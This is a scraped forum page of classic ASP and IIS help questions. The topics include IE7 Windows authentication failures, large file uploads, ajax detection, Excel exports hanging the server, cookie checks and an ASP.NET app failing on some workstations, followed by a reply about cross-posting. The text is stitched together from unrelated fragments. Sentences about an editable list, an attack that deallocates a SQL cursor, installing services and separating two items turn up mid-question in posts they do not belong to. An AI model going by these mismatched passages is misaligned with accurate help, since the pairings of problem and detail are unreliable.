    - Integrated Windows authentication fails sporadically IE7 clients I have an intranet site on my LAN which has "anonymous access" turned OFF, and "integrated Windows authentication" turned on. This allows me to access the "AUTH_USER" server variable, which I use to look up application rights in SQL Server. With IE6 clients, this has worked flawlessly for several years. Our users are currently running IE6, but my parent agency has announced an upgrade to IE7 beginning next month, so I have installed IE7 on a couple machines for testing. What I have observed is that the AUTH_USER variable is sporadically not available to ASP, when connecting from the IE7 client. This has the effect of prompting the user for Windows authentication when they attempt to open any page on my site. I desperately want to avoid this. Does anyone know a) why IE7 results in the AUTH_USER variable sporadically not being available to ASP, and b) if there is anything I can configure on either client or server that will shore up this flaw? What I would like to do is make the list editable so that if the data returned doesnt contain what I want, I can type in the data I require which will then be updated to the database when the form is posted.     - Uploading Large Files I'm using a pure ASP upload script to handle file uploading. We run IIS6 and I'm aware of the AspMaxRequestEntityAllowed variable in the metabase. I upped this to allow the file size maximum and it was working for the past couple months. Now all of a sudden in the past couple of days we are seeming to have problems. The upload works fine for anything up to around 2mb (or so it seems). When uploading about 20mb worth (10x2mb files), I get the following error (thrown from firefox). I tried changing Response.Expires, Server.ScriptTimeout, and the connection timeout setting for the website in IIS. Connection Interrupted The connection to the server was reset while the page was loading. The network link was interrupted while negotiating a connection. Please try again. When uploading about 2-10mb worth of files, I get an error thrown by ASP. The error typically just means that AspMaxRequestEntityAllowed needs to be increased, but since I've already increased it as high as it can go, I'm really confused.     - How does a page know if it is being called by ajax? My web site HTML comes from a database via querystring e.g. page.asp?pid=55 I have a separate asp search page, search.asp. Its output is retrieved by an ajax call from page.asp and its HTML is then neatly wrapped and styled by page.asp. I want search.asp to recognise if it is not being called via ajax from page.asp, but directly e.g. via the address bar (and if so, redirect to page.asp). Do I need to put something into the posted string, or (better) is there an asp method that can do this?     - Downloading web page from secure ASP web site. I work for a large chain coporation. My schedule is posted on their secure web site which I have a user name and a password for. I want to create a URL string that can be sent (using VBA inside of Outlook) which contain my username and passsword and allow me access to my schedule information. I tried: IE.Navigate2 "https://mydish.olivegarden.com/company/TOG/home.asp?user=[myusername]&password=[mypassword]" where [myusername] and [mypassword] were replaced by the actual strings I use to login through the web site. That doesn't work. I guessed at the variable names "user" and "password". I looked through the login pages source text for help here, but didn't find any.     - Export very large excel hang IIS Here's the long story short. At work we have to real-time generate a report(excel format) which involves a number of table joining. So to export into excel contentType 'application/vnd.ms-excel' is used, and data are written as table, looping each row of recordset data as table row. Problem is when user hit export and attempt to open/save the file, file would then be downloaded at constant rate. But during this time, entire server would be irresponsive and in a hang-like state, this is expereinced by all users. When they attmept to visit another asp page they would wait until the page eventually timeout. This will continues until the report was completely generated and downloaded by users. It amuses me that the last thing the attack does is DEALLOCATE its cursor. My SQL Server DBA tells me this makes no difference. So... Are these hackers cargo cultists? My web project works in my dev environment as all installs properly there and am able to run Install Services. I've read that this is because my dev environ has vs.net.     - Extracting data from a document Hi Guys, Not a problem with my code, but something I would like to add, (ASP VBScript) at the moment I have a form where a user uploads their details including a document (Doc, PDF, TXT, Docx) The document is uploaded to a folder on the server with the address being stored in the database and I'm tracking the user id through sessions. What I would like to do after the upload is redirect to a blank page, where some script extracts the data from the document and inserts it into another field on the database associated with the user id, I think this may be called parsing, but I'm at a complete loss, I don't suppose you guys have any ideas on this do you.     - Checking for existence of a cookie I tried to post this last week, but never saw it, so I hope it's not a duplicate. (Sorry if it is.) I am rewriting our member log-in page in classic ASP from PHP. We will be switching platforms next month. Every member has an access number to log in. Once they have logged in, if they accept it, a cookie is provided so they do not have to log in again. When the code is supplied via the cookie or form, it is validated against a database file to determine the level (customer, distributor, etc.) and the page is built accordingly. If the code has been inactivated or is no longer valid, appropriate messages are supplied. Pretty basic stuff. The first thing I want to do is to check if the cooky exists on the client computer. PHP had code for this, but I'm not sure I'm doing it correctly in classic ASP. My opening code is below. This is before any HTML on the page, as I have to determine if cookeis need to be set or deleted before the page opens. When I run this on my IIS server here, the page displays an error 500, but no hints as to what line the error is in. Can anyone help.     - ASP.NET web app works on some, not all, workstations I have a client that has contracted with a bank to process checks over the Internet. The solution includes a check scanner and APS.NET web application. The application does not work for all workstations at the client site. There are two laptop computers than can run the web application and all it's functions w/o failure. They have been able to do this from day one w/o modification. No other PC workstations can run all of the web application functions. Some page return an 'Internal Server Error' message. The page displayed is a custom error page with no other details. For some reason the owners of the web application have no clue why their application will work for some, but not others. Some facts: All workstations are XP SP2 There is a mix of IE6 and 7 but this does not seem to be an issue because each laptop has a different version (1 has IE7, the other has IE6). Application will not allow browsers other than IE5.5 or higher (Firefox is out) The application requires an ActiveX control to interface with the scanner. Check scanning is not an issue. How can I stop this?

Alternatively is there a function that will separate the two for me?

I really don't understand why you posted this here. You got a very thorough
explanation of the problem, as well as some good workarounds, in the thread
you started in .scripting.vbscript. There really is nothing any of us will
be able to add to what you received there.If what they have written makes no
sense to you, the polite thing to do would be to post a reply in that thread
explaining what you do not understand or asking how to apply what they have
explained to you. As you can tell, the participants in that thread like to
type and would be happy to help you understand what they've said.
